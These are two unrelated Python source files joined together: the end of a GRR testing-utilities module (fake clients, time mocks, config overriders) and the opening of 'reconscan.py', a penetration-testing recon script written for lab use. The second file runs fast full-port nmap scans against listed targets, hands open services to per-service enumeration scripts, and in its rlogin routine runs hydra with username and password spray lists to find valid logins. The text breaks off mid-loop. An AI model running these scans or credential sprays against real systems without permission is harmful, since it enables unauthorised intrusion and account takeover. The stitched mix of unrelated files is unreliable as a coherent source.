with_limited_call_frequency_stubber.Start()
self.addCleanup(with_limited_call_frequency_stubber.Stop)
def _SetupFakeStatsContext(self):
"""Creates a stats context for running tests based on defined metrics."""
# Reset stats_collector_instance to None, then reinitialize it.
patcher = mock.patch.object(stats_collector_instance, "_stats_singleton",
None)
patcher.start()
self.addCleanup(patcher.stop)
stats_collector_instance.Set(
prometheus_stats_collector.PrometheusStatsCollector())
def SetupClient(self,
client_nr,
arch="x86_64",
fqdn=None,
labels=None,
last_boot_time=None,
install_time=None,
kernel="4.0.0",
os_version="buster/sid",
ping=None,
system="Linux",
users=None,
memory_size=None,
add_cert=True,
fleetspeak_enabled=False):
"""Prepares a test client mock to be used.
Args:
client_nr: int The GRR ID to be used. 0xABCD maps to C.100000000000abcd in
canonical representation.
arch: string
fqdn: string
labels: list of labels (strings)
last_boot_time: RDFDatetime
install_time: RDFDatetime
kernel: string
os_version: string
ping: RDFDatetime
system: string
users: list of rdf_client.User objects.
memory_size: bytes
add_cert: boolean
fleetspeak_enabled: boolean
Returns:
the client_id: string
"""
client = self._SetupTestClientObject(
client_nr,
add_cert=add_cert,
arch=arch,
fqdn=fqdn,
install_time=install_time,
labels=labels,
last_boot_time=last_boot_time,
kernel=kernel,
memory_size=memory_size,
os_version=os_version,
ping=ping or rdfvalue.RDFDatetime.Now(),
system=system,
users=users,
fleetspeak_enabled=fleetspeak_enabled)
return client.client_id
def SetupClients(self, nr_clients, *args, **kwargs):
"""Prepares nr_clients test client mocks to be used."""
return self.SetupClientsWithIndices(range(nr_clients), *args, **kwargs)
def SetupClientsWithIndices(self, indices, *args, **kwargs):
"""Sets up mock clients, one for each numerical index in 'indices'."""
return [self.SetupClient(i, *args, **kwargs) for i in indices]
def _TestClientInfo(self, labels=None):
res = rdf_client.ClientInformation(
client_name="GRR Monitor",
client_version=config.CONFIG["Source.version_numeric"],
build_time="1980-01-01")
if labels is None:
res.labels = ["label1", "label2"]
else:
res.labels = labels
return res
def _TestInterfaces(self, client_nr):
ip1 = rdf_client_network.NetworkAddress()
ip1.human_readable_address = "192.168.0.%d" % client_nr
ip2 = rdf_client_network.NetworkAddress()
ip2.human_readable_address = "2001:abcd::%x" % client_nr
mac1 = rdf_client_network.MacAddress.FromHumanReadableAddress(
"abcbccddee%02x" % client_nr)
mac1 = rdf_client_network.MacAddress.FromHumanReadableAddress(
"aabbccddee%02x" % client_nr)
mac2 = rdf_client_network.MacAddress.FromHumanReadableAddress(
"bbccddeeff%02x" % client_nr)
return [
rdf_client_network.Interface(ifname="if0", addresses=[ip1, ip2]),
rdf_client_network.Interface(ifname="if1", mac_address=mac1),
rdf_client_network.Interface(ifname="if2", mac_address=mac2),
]
def _SetupTestClientObject(self,
client_nr,
add_cert=True,
arch="x86_64",
fqdn=None,
install_time=None,
last_boot_time=None,
kernel="4.0.0",
memory_size=None,
os_version="buster/sid",
ping=None,
system="Linux",
users=None,
labels=None,
fleetspeak_enabled=False):
"""Prepares a test client object."""
client_id = u"C.1%015x" % client_nr
client = rdf_objects.ClientSnapshot(client_id=client_id)
client.startup_info.client_info = self._TestClientInfo(labels=labels)
if last_boot_time is not None:
client.startup_info.boot_time = last_boot_time
client.knowledge_base.fqdn = fqdn or "Host-%x.example.com" % client_nr
client.knowledge_base.os = system
client.knowledge_base.users = users or [
rdf_client.User(username=u"user1"),
rdf_client.User(username=u"user2"),
]
client.os_version = os_version
client.arch = arch
client.kernel = kernel
client.interfaces = self._TestInterfaces(client_nr)
client.install_time = install_time
client.hardware_info = rdf_client.HardwareInfo(
system_manufacturer="System-Manufacturer-%x" % client_nr,
bios_version="Bios-Version-%x" % client_nr)
if memory_size is not None:
client.memory_size = memory_size
ping = ping or rdfvalue.RDFDatetime.Now()
if add_cert:
cert = self.ClientCertFromPrivateKey(config.CONFIG["Client.private_key"])
else:
cert = None
data_store.REL_DB.WriteClientMetadata(
client_id,
last_ping=ping,
certificate=cert,
fleetspeak_enabled=fleetspeak_enabled)
data_store.REL_DB.WriteClientSnapshot(client)
client_index.ClientIndex().AddClient(client)
if labels is not None:
data_store.REL_DB.AddClientLabels(client_id, u"GRR", labels)
client_index.ClientIndex().AddClientLabels(client_id, labels)
return client
def AddClientLabel(self, client_id, owner, name):
data_store.REL_DB.AddClientLabels(client_id, owner, [name])
client_index.ClientIndex().AddClientLabels(client_id, [name])
def ClientCertFromPrivateKey(self, private_key):
common_name = rdf_client.ClientURN.FromPrivateKey(private_key)
csr = rdf_crypto.CertificateSigningRequest(
common_name=common_name, private_key=private_key)
return rdf_crypto.RDFX509Cert.ClientCertFromCSR(csr)
def GenerateToken(self, username, reason):
return access_control.ACLToken(username=username, reason=reason)
class ConfigOverrider(object):
"""A context to temporarily change config options."""
def __init__(self, overrides):
self._overrides = overrides
self._old_cache = None
self._old_global_override = None
def __enter__(self):
self.Start()
def Start(self):
self._old_cache = config.CONFIG.cache
config.CONFIG.cache = dict()
self._old_global_override = config.CONFIG.global_override
config.CONFIG.global_override = self._old_global_override.copy()
config.CONFIG.global_override.update(self._overrides)
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
def Stop(self):
config.CONFIG.cache = self._old_cache
config.CONFIG.global_override = self._old_global_override
class PreserveConfig(object):
def __enter__(self):
self.Start()
def Start(self):
self.old_config = config.CONFIG
config.CONFIG = self.old_config.MakeNewConfig()
config.CONFIG.initialized = self.old_config.initialized
config.CONFIG.SetWriteBack(self.old_config.writeback.filename)
config.CONFIG.raw_data = self.old_config.raw_data.copy()
config.CONFIG.writeback_data = self.old_config.writeback_data.copy()
def __exit__(self, unused_type, unused_value, unused_traceback):
self.Stop()
def Stop(self):
config.CONFIG = self.old_config
class FakeTime(object):
"""A context manager for faking time."""
def __init__(self, fake_time, increment=0):
if isinstance(fake_time, rdfvalue.RDFDatetime):
self.time = fake_time.AsMicrosecondsSinceEpoch() / 1e6
elif isinstance(fake_time, str):
self.time = rdfvalue.RDFDatetime.FromHumanReadable(
fake_time).AsMicrosecondsSinceEpoch() / 1e6
else:
self.time = fake_time
self.increment = increment
def __enter__(self):
self.old_time = time.time
def Time():
self.time += self.increment
return self.time
time.time = Time
self.old_strftime = time.strftime
def Strftime(form, t=time.localtime(Time())):
return self.old_strftime(form, t)
time.strftime = Strftime
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
time.time = self.old_time
time.strftime = self.old_strftime
# TODO(hanuszczak): `FakeTime` and `FakeTimeline` serve a similar purpose,
# although `FakeTimeline` (arguably) allows to write more sophisticated tests.
# Therefore, it should be possible to rewrite existing test code to use
# `FakeTimeline` instead of `FakeTime`. Once done, `FakeTime` should be removed.
# TODO(hanuszczak): Write proper documentation.
class FakeTimeline(object):
"""A context manager for testing time-aware code.
This utility class overrides `time.sleep` and `time.time` methods so that the
code that uses them can be tested. It is assumed that the code that needs to
be tested runs on some thread. Using `Run` method one can simulate running
this thread for certain amount of time but without spending that time waiting
for anything.
While internally the simulation actually executes the code on a separate
thread, it can be thought as if the code was executed synchronously on the
current thread. However, the time flow is "immediate" and `time.sleep` calls
do not really block.
For example, it is possible to instantly simulate running a thread for half an
hour (assuming that most of that time the thread would be spent sleeping).
In order to reliably test flow of time-aware code, it is assumed that only the
`time.sleep` function causes the time flow. In other words, every non-`sleep`
line of code is assumed to be executed instantly. In particular, if there is
an infinite loop without any `time.sleep` calls the running the simulation
for any number of seconds will block indefinitely. This is not a big issue
since this class is intended to be used only for testing purposes.
"""
class _WorkerThreadExit(Exception): # pylint: disable=g-bad-exception-name
pass
def __init__(self, thread, now=None):
"""Initializes the timeline.
Args:
thread: A thread to perform controlled execution on.
now: An `RDFDatetime` object representing starting point of the timeline.
If no value is provided, current time is used.
Raises:
TypeError: If `thread` is not an instance of `Thread` or if `now` is not
an instance of `RDFDatetime`.
"""
if not isinstance(thread, threading.Thread):
raise TypeError("`thread` is not an instance of `threading.Thread`")
if now is not None and not isinstance(now, rdfvalue.RDFDatetime):
raise TypeError("`now` is not an instance of `rdfvalue.RDFDatetime`")
self._thread = thread
self._owner_thread_turn = threading.Event()
self._worker_thread_turn = threading.Event()
# Fake, "current" number of seconds since epoch.
self._time = (now or rdfvalue.RDFDatetime.Now()).AsSecondsSinceEpoch()
# Number of seconds that the worker thread can sleep.
self._budget = 0
self._worker_thread = None
self._worker_thread_done = False
self._worker_thread_exception = None
def Run(self, duration):
"""Simulated running the underlying thread for the specified duration.
Args:
duration: A `Duration` object describing for how long simulate the thread.
Raises:
TypeError: If `duration` is not an instance of `rdfvalue.Duration`.
AssertionError: If this method is called without automatic context.
"""
precondition.AssertType(duration, rdfvalue.Duration)
if self._worker_thread is None:
raise AssertionError("Worker thread hasn't been started (method was "
"probably called without context initialization)")
if self._worker_thread_done:
return
self._budget += duration.ToInt(rdfvalue.SECONDS)
self._original_time = time.time
self._original_sleep = time.sleep
with utils.Stubber(time, "time", self._Time),\
utils.Stubber(time, "sleep", self._Sleep):
self._owner_thread_turn.clear()
self._worker_thread_turn.set()
self._owner_thread_turn.wait()
if self._worker_thread_exception is not None:
# TODO(hanuszczak): Investigate why this linter warning is triggered.
raise self._worker_thread_exception # pylint: disable=raising-bad-type
def __enter__(self):
if self._worker_thread is not None:
raise AssertionError("Worker thread has been already started, context "
"cannot be reused.")
def Worker():
self._worker_thread_turn.wait()
try:
if self._worker_thread_done:
raise FakeTimeline._WorkerThreadExit
self._thread.run()
except FakeTimeline._WorkerThreadExit:
pass
except Exception as exception: # pylint: disable=broad-except
self._worker_thread_exception = exception
self._worker_thread_done = True
self._owner_thread_turn.set()
self._worker_thread = threading.Thread(
target=Worker, name="FakeTimelineThread")
self._worker_thread.start()
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
del exc_type, exc_value, exc_traceback # Unused.
self._worker_thread_done = True
self._worker_thread_turn.set()
self._worker_thread.join(5.0)
if self._worker_thread.is_alive():
raise RuntimeError("FakeTimelineThread did not complete.")
def _Sleep(self, seconds):
if threading.current_thread() is not self._worker_thread:
return self._original_sleep(seconds)
self._time += seconds
self._budget -= seconds
while self._budget < 0:
self._worker_thread_turn.clear()
self._owner_thread_turn.set()
self._worker_thread_turn.wait()
if self._worker_thread_done:
raise FakeTimeline._WorkerThreadExit()
def _Time(self):
if threading.current_thread() is not self._worker_thread:
return self._original_time()
return self._time
class FakeDateTimeUTC(object):
"""A context manager for faking time when using datetime.utcnow."""
def __init__(self, fake_time, increment=0):
self.time = fake_time
self.increment = increment
def __enter__(self):
self.old_datetime = datetime.datetime
class FakeDateTime(object):
def __init__(self, time_val, increment, orig_datetime):
self.time = time_val
self.increment = increment
self.orig_datetime = orig_datetime
def __call__(self, *args, **kw):
return self.orig_datetime(*args, **kw)
def __getattribute__(self, name):
try:
return object.__getattribute__(self, name)
except AttributeError:
return getattr(self.orig_datetime, name)
def utcnow(self): # pylint: disable=invalid-name
self.time += self.increment
return self.orig_datetime.utcfromtimestamp(self.time)
datetime.datetime = FakeDateTime(self.time, self.increment,
self.old_datetime)
def __exit__(self, unused_type, unused_value, unused_traceback):
datetime.datetime = self.old_datetime
class Instrument(object):
"""A helper to instrument a function call.
Stores a copy of all function call args locally for later inspection.
"""
def __init__(self, module, target_name):
self.old_target = getattr(module, target_name)
@functools.wraps(self.old_target)
def Wrapper(*args, **kwargs):
self.args.append(args)
self.kwargs.append(kwargs)
self.call_count += 1
return self.old_target(*args, **kwargs)
self.stubber = utils.Stubber(module, target_name, Wrapper)
self.args = []
self.kwargs = []
self.call_count = 0
def __enter__(self):
self.stubber.__enter__()
return self
def __exit__(self, t, value, tb):
return self.stubber.__exit__(t, value, tb)
def RequiresPackage(package_name):
"""Skip this test if required package isn't present.
Note this will only work in opensource testing where we actually have
packages.
Args:
package_name: string
Returns:
Decorator function
"""
def Decorator(test_function):
@functools.wraps(test_function)
def Wrapper(*args, **kwargs):
try:
pkg_resources.get_distribution(package_name)
except pkg_resources.DistributionNotFound:
raise unittest.SkipTest("Skipping, package %s not installed" %
package_name)
return test_function(*args, **kwargs)
return Wrapper
return Decorator
class SuppressLogs(object):
"""A context manager for suppressing logging."""
def __enter__(self):
self.old_error = logging.error
self.old_warning = logging.warning
self.old_info = logging.info
self.old_debug = logging.debug
logging.error = lambda *args, **kw: None
logging.warning = lambda *args, **kw: None
logging.info = lambda *args, **kw: None
logging.debug = lambda *args, **kw: None
return self
def __exit__(self, unused_type, unused_value, unused_traceback):
logging.error = self.old_error
logging.warning = self.old_warning
logging.info = self.old_info
logging.debug = self.old_debug
# TODO(user): It would be nice if all doctested functions (or even examples)
# had their own method in the TestCase. This allows faster developer cycles,
# because the developer sees all failures instead of only the first one. Also,
# it makes it easier to see if a doctest has been added for a new docstring.
class DocTest(absltest.TestCase):
"""A TestCase that tests examples in docstrings using doctest.
Attributes:
module: A reference to the module to be tested.
"""
module = None
def testDocStrings(self):
"""Test all examples in docstrings using doctest."""
if not compatibility.PY2:
# TODO(user): Migrate all doctests to Python 3 only once we use Python 3
# in production.
self.skipTest("DocTest is disabled for Python 3 because of unicode string"
" formatting.")
self.assertIsNotNone(self.module, "Set DocTest.module to test docstrings.")
try:
num_failed, num_attempted = doctest.testmod(
self.module, raise_on_error=True)
except doctest.DocTestFailure as e:
name = e.test.name
if "." in name:
name = name.split(".")[-1] # Remove long module prefix.
filename = os.path.basename(e.test.filename)
self.fail("DocTestFailure in {} ({} on line {}):\n"
">>> {}Expected : {}Actual : {}".format(
name, filename, e.test.lineno, e.example.source,
e.example.want, e.got))
# Fail if DocTest is referenced, but no examples in docstrings are present.
self.assertGreater(num_attempted, 0, "No doctests were found!")
# num_failed > 0 should not happen because raise_on_error = True.
self.assertEqual(num_failed, 0, "{} doctests failed.".format(num_failed))
def main(argv=None):
del argv # Unused.
testing_startup.TestInit()
absltest.main()
|
reconscan.py
|
#!/usr/bin/env python
###############################################################################################################
## [Title]: reconscan.py -- a recon/enumeration script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
## [Updates]: Reward1
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed remotely against a list of IPs to enumerate discovered services such
## as smb, smtp, snmp, ftp and other.
##
## This script really likes when you put a targets.txt file containing targets (one per line) at
## /root/scripts/recon_enum/results/exam/targets.txt
##
## The script will run nmap (very fast min rate) against all ports, pass open ports to Nmap, and then run an nmap scan
## against all ports.
##-------------------------------------------------------------------------------------------------------------
## [Run]:
## Execute setup.sh in the scripts folder
## /root/scripts/recon_enum/./reconscan.py
## or
## python /root/scripts/recon_enum/reconscan.py
##-------------------------------------------------------------------------------------------------------------
## [Warning]:
## This script comes as-is with no promise of functionality or accuracy. I strictly wrote it for personal use
## I have no plans to maintain updates, I did not write it to be efficient and in some cases you may find the
## functions may not produce the desired results so use at your own risk/discretion. I wrote this script to
## target machines in a lab environment so please only use it against systems for which you have permission!!
##-------------------------------------------------------------------------------------------------------------
## [Modification, Distribution, and Attribution]:
## You are free to modify and/or distribute this script as you wish. I only ask that you maintain original
## author attribution and not attempt to sell it or incorporate it into any commercial offering (as if it's
## worth anything anyway :)
##-------------------------------------------------------------------------------------------------------------
## [TODO]
## Expand: "Alive" script. Identify alive hosts using 'advanced' techniques.
## Pre-Exploitation Enumeration > Active > Internal Infrastructure Mapping > Identify Alive IPs
## Expand: RDPenum with rdp-sec-check
## Running each script individually does not ensure their output directory paths exist...QoL feature...
## Fix DNSRecon
## Expand: DirbustEverything
## : more tools! DirBuster, Dirsearch...WFUZZ still needs extensions
## : PHP Filters
## : Eyewitness: web page screenshots
## : Photon, nice crawler. Can ensure things are not missed (currently using Cewl to crawl and wordlist)
## : grab (Status: 301) pages (generalize STAT200 function) and gobust just on those
## Expand: nmapHTTPVuln
## : snallygaster https://github.com/hannob/snallygaster
## Expand FTP/TFTP: Utilize anonymous and credentialed DotDotPwn scan
## Expand SMTPrecon
## : currently only scans 25. need: 25,110,143,465,587,993,995 (IMAP/POP/Exchange)
## : Change to ip_address, port. Pass specific ports only, currently hardcoded 25,465,587
## : Ruler for exchange (possibly)
## Expand SMBRecon
## : hydra or crackmapexec for spray/brute #need to specify Domain, also worry about lockout
## Expand dirTrav:
## Need to debug all cases (page?= vulns and windows)
## Option to run reconscan with an IP range to pass to aliverecon
## Expand ReconScan:
## Other tools to consider: WHOIS, DNSRecon, Sublist3r
## Other tools to consider: WafW00f, WAFNinja, XSS Scanner, Arachni, Spaghetti, TheHarvester, Metagoofil,
## Other tools to consider: A2SV
## Separate CMSscannerrecon: WPscan, WPscanner, WPSeku, Droopescan,
## Create "AutoADPwn": Invoke several modules, AD recon, bloodhound, Empire/Deathstar
## Need scripts for:
## rsh, vnc
##
## [THOUGHTS]
## Organizing everything by IP address would probably be a lot better, but it seems like a lot of work to go through everything to make that change...
## Split http nmap scripts
##
## [NOTES]
## vulners.nse requires -sV flag
###############################################################################################################
import subprocess
import multiprocessing
from multiprocessing import Process, Queue
import os
import time
import errno
import shutil
from colorama import init, Fore, Style
init()
# Fore: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Back: BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE, RESET.
# Style: DIM, NORMAL, BRIGHT, RESET_ALL
#PRIVATE VARS
userAgent = "'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'" #This will replace the default nmap http agent string
FAST_NMAP_MIN_RATE = "10000"
SLOW_NMAP_MIN_RATE = "1000"
def multProc(targetin, scanip, port):
jobs = []
p = multiprocessing.Process(target=targetin, args=(scanip,port))
jobs.append(p)
p.start()
return
def jserveEnum(ip_address, port):
print Fore.GREEN + "INFO: Enumerating Apache Jserve on %s:%s" % (ip_address, port) + Style.RESET_ALL
print "INFO: Enumerating Apache Jserve on %s:%s" % (ip_address, port)
subprocess.check_output(['auxiliary/./jserverecon.py',ip_address,port])
return
def dnsEnum(ip_address, port):
print "INFO: Enumerating DNS on %s:%s" % (ip_address, port)
if port.strip() == "53":
SCRIPT = "./dnsrecon.py %s" % (ip_address)# execute the python script
subprocess.check_output(['./dnsrecon.py',ip_address])
return
def ftpEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
print "INFO: Enumerating ftp on %s:%s" % (ip_address, port)
#FTPRECON in subdirectory in case ssh/telnet/mysql are present, hydra will have
#separate hydra.restore files
SCRIPT = "ftp/./ftprecon.py %s %s" % (ip_address, port)
subprocess.check_output(['ftp/./ftprecon.py',ip_address,port])
return
def fingerEnum(ip_address, port):
print "INFO: Enumerating Finger on %s:%s" % (ip_address, port)
FINGERSCAN = "nmap -n -sV -Pn -vv -p %s --script finger,vulners -oA /root/scripts/recon_enum/results/exam/finger/%s_finger.xml %s" % (port, ip_address, ip_address)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','finger,vulners','-oA','/root/scripts/recon_enum/results/exam/finger/%s_%s_finger' % (ip_address,port),ip_address])
return
def httpEnum(ip_address, port):
path = "/root/scripts/recon_enum/results/exam/dirb/%s" % (port)
mkdir_p(path)
print "INFO: Enumerating http on %s:%s" % (ip_address, port)
#print "INFO: Performing nmap web script scan for %s:%s" % (ip_address, port)
subprocess.check_output(['./webrecon.py','-a',userAgent,'http://%s:%s' % (ip_address, port)])
#print "INFO: webRecon scan completed for %s:%s" % (ip_address, port)
#print "INFO: dirbust scan started on %s:%s" % (ip_address, port)
subprocess.check_output(['./dirbustEVERYTHING.py','-a',userAgent,'-p','1','-i','4','http://%s:%s' % (ip_address,port)])
#print "INFO: dirbust scan completed for %s:%s" % (ip_address, port)
return
def httpsEnum(ip_address, port):
path = "/root/scripts/recon_enum/results/exam/dirb/%s" % (port)
mkdir_p(path)
print "INFO: Enumerating https on %s:%s" % (ip_address, port)
#print "INFO: Performing nmap web script scan for %s:%s" % (ip_address, port)
subprocess.check_output(['./webRecon.py','-a',userAgent,'https://%s:%s' % (ip_address, port)])
#print "INFO: webRecon scan completed for %s:%s" % (ip_address, port)
#print "INFO: dirbust scan started on %s:%s" % (ip_address, port)
subprocess.check_output(['./dirbustEVERYTHING.py','-a',userAgent,'-p','1','-i','4','https://%s:%s' % (ip_address,port)])
#print "INFO: dirbust scan completed for %s:%s" % (ip_address, port)
return
def mssqlEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#MYSQLRECON in subdirectory in case multiple Hydra.restore files. default, nmap performs brute.
print "INFO: Enumerating MS-SQL on %s:%s" % (ip_address, port)
subprocess.check_output(['mssql/./mssqlrecon.py',ip_address,port])
return
def ldapEnum(ip_address, port):
print "INFO: Enumerating LDAP on %s:%s" % (ip_address, port)
subprocess.check_output(['./ldaprecon.py',ip_address,port])
return
def mysqlEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#MYSQLRECON in subdirectory in case ftp/ssh/telnet are present, hydra will have
print "INFO: Enumerating MySQL on %s:%s" % (ip_address, port)
subprocess.check_output(['mysql/./mysqlrecon.py',ip_address,port])
return
def nfsEnum(ip_address, port):
print "INFO: Enumerating NFS on %s:%s" % (ip_address, port)
subprocess.check_output(['./nfsrecon.py',ip_address,port])
return
def msrpc(ip_address, port):
print "INFO: Enumerating MSRPC on %s:%s" % (ip_address, port)
#Impacket RPC packages
subprocess.check_output(['./msrpcrecon.py',ip_address,port])
return
#port 111 #apt-get install, nfs-common
#Running
#rpc-grind: Fingerprints target RPC port to extract service, rpc number, and version
#rpcinfo: Connects to portmapper and fetches a list of all registered programs
#Not Running
#rpcap-brute: Brute against WinPcap Remote Capture
#rpcap-info: Retrieve interface information through rpcap service
def rpcbindEnum(ip_address, port):
print "INFO: Enumerating RPCBind on %s:%s" % (ip_address, port)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','rpc-grind,rpcinfo','-oA',"/root/scripts/recon_enum/results/exam/rpc/%s_%s_rpc" % (ip_address,port),ip_address])
RPCINFOSCAN1 = "rpcinfo %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN1, shell=True)
RPCINFOSCAN2 = "rpcinfo -p %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN2, shell=True)
RPCINFOSCAN3 = "rpcinfo -m %s > /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt && echo -e '\n' >> /root/scripts/recon_enum/results/exam/rpc/%s_rpcinfo.txt" % (ip_address, ip_address, ip_address)
subprocess.check_output(RPCINFOSCAN3, shell=True)
return
def rdpEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#RDPRECON in subdir in case multiple hydra.restore files
print "INFO: Enumerating RDP on %s:%s" % (ip_address, port)
subprocess.check_output(['rdp/./rdprecon.py',ip_address,port])
return
def rloginEnum(ip_address, port):
#Typically only 513, so we'll check
if port.strip() == "513":
print "INFO: Enumerating RLogin on %s:%s" % (ip_address, port)
try:
results = subprocess.check_output(['hydra','-L','/root/lists/userlist.txt','-P','/root/lists/quick_password_spray.txt','-f','-o','/root/scripts/recon_enum/results/exam/%s_rloginhydra' % (ip_address),'-u',ip_address,'rlogin']).split("\n")
for res in results:
if "login:" in res:
print "[*] Valid rlogin credentials found: " + res
except subprocess.CalledProcessError as hydrerr:
if hydrerr.returncode == 255:
print "Hydra broke early with status 255, it must have found something! Check rloginhydra for output."
print "Note you may need to download rsh-client."
elif hydrerr.returncode != 0:
print "Hydra broke:"
print hydrerr.returncode
print hydrerr.output
else:
print "INFO: No valid rlogin credentials found"
else:
print "Other rlogin services (exec/shell) detected. Recon manually: %s:%s" % (ip_address, port)
return
def sshEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
print "INFO: Enumerating SSH on %s:%s" % (ip_address, port)
subprocess.check_output(['./sshrecon.py',ip_address,port])
return
def snmpEnum(ip_address, port):
print "INFO: Enumerating snmp on %s:%s" % (ip_address, port)
subprocess.check_output(['./snmprecon.py',ip_address])
return
def smtpEnum(ip_address, port):
print "INFO: Enumerating smtp on %s:%s" % (ip_address, port)
if port.strip() == "25":
subprocess.check_output(['./smtprecon.py',ip_address])
else:
print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)"
return
def smbEnum(ip_address, port):
print "INFO: Enumerating SMB on %s:%s" % (ip_address, port)
if port.strip() == "139":
subprocess.check_output(['./smbrecon.py',ip_address,port])
if port.strip() == "445":
subprocess.check_output(['./smbrecon.py',ip_address,port])
if port.strip() == "137":
subprocess.check_output(['./smbrecon.py',ip_address,port])
return
def telnetEnum(ip_address, port):
#EDIT WITH USERNAME/PASSWORD LISTS
#TELNETRECON in subdirectory in case ftp/ssh/mysql are present, hydra will have
#separate hydra.restore files
print "INFO: Enumerating Telnet on %s:%s" % (ip_address, port)
subprocess.check_output(['telnet/./telnetrecon.py',ip_address,port])
return
def tftpEnum(ip_address, port):
print "INFO: Enumerating TFTP on %s:%s" % (ip_address, port)
subprocess.check_output(['nmap','-n','-sV','-Pn','-vv','-p',port,'--script','tftp-enum,vulners','-oA',"/root/scripts/recon_enum/results/exam/tftp/%s_%s_tftp" % (ip_address,port),ip_address])
return
def nmapFullSlowScan(ip_address):
ip_address = ip_address.strip()
print "INFO: Running Full Slow TCP/UDP nmap scans for %s" % (ip_address)
tcplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sT','-T','3','-p-','--max-retries','1','--min-rate',SLOW_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_FULL" % ip_address,ip_address]).split("\n")
for line in tcplines:
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
print ("INFO: Full Slow Nmap for %s found TCP: %s on %s") % (ip_address, service, port)
udplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sU','-T','3','-p-','--max-retries','1','--min-rate',SLOW_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%sU_FULL" % ip_address,ip_address]).split("\n")
for line in udplines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
print ("INFO: Full Slow Nmap for %s found UDP: %s on %s") % (ip_address, service, port)
print "INFO: Full Slow TCP/UDP Nmap scans completed for %s" % (ip_address)
return
#Be sure to change the interface if needed
#-mT/-mU TCP/UDP respectively, full range of ports. -L timeout 3 seconds (7 default), 300 packets per second (default)
# -n Do not do name service lookup
# -vv be very verbose
# --stats-every 30s Give stats every 30 seconds
# -Pn Treat hosts as online (skip host discovery)
# -sT Full TCP connect, no syn machine guns
# -T4 Timing 4, faster scan
# -p- Scan every port
# --max-retires 1 Only retry a port once
# --min-rate Send packets at a minimum rate of defined
# -oA Give output in all three output formats
#
def nmapFullFastScan(ip_address):
ip_address = ip_address.strip()
print "INFO: Running Full Fast TCP/UDP nmap scans for " + ip_address
tcplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sT','-T','4','-p-','--max-retries','1','--min-rate',FAST_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_INITIAL" % ip_address,ip_address]).split("\n")
tcpPorts = []
udpPorts = []
for line in tcplines:
line = line.strip()
if ("tcp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
tcpPorts.append(port)
print ("INFO: Full Fast Nmap for %s found TCP: %s on %s") % (ip_address, service, port)
for port in tcpPorts: #the last element in the list is blank
if port != "":
multProc(nmapVersionTCPAndPass, ip_address, port)
udplines = subprocess.check_output(['nmap','-n','-vv','--stats-every','30s','-Pn','-sU','-T','4','-p-','--max-retries','1','--min-rate',FAST_NMAP_MIN_RATE,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%sU_INITIAL" % ip_address,ip_address]).split("\n")
for line in udplines:
line = line.strip()
if ("udp" in line) and ("open" in line) and not ("Discovered" in line):
while " " in line:
line = line.replace(" ", " ");
linesplit= line.split(" ")
service = linesplit[2] # grab the service name
port = line.split(" ")[0] # grab the port/proto
port = port.split("/")[0]
udpPorts.append(port)
print ("INFO: Full Fast for %s found UDP: %s on %s") % (ip_address, service, port)
for port in udpPorts: #the last element in the list is blank
if port != "":
multProc(nmapVersionUDPAndPass, ip_address, port)
print "INFO: Full Fast TCP/UDP nmap finished for %s. Tasks passed to designated scripts" % (ip_address)
jobs = []
q = multiprocessing.Process(target=nmapFullSlowScan, args=(scanip,)) #comma needed
jobs.append(q)
q.start()
return
def nmapVersionTCPAndPass(ip_address, port):
#need this to version ports and in case there is no recon module we'll have a scan for it. Runs default scripts.
uniNmapTCP = "nmap -n -vv -Pn -A -sC -sT -T 4 -p %s -oA '/root/scripts/recon_enum/results/exam/nmap/%s_%s' %s" % (port, ip_address, port, ip_address)
lines = subprocess.check_output(['nmap','-n','-vv','-Pn','-A','-sC','-sT','-T','4','-p',port,'-oA',"/root/scripts/recon_enum/results/exam/nmap/%s_%s" % (ip_address,port),ip_address]).split("\n")
print "INFO: nmap version and pass for TCP %s:%s completed" % (ip_address, port)
for line in lines:
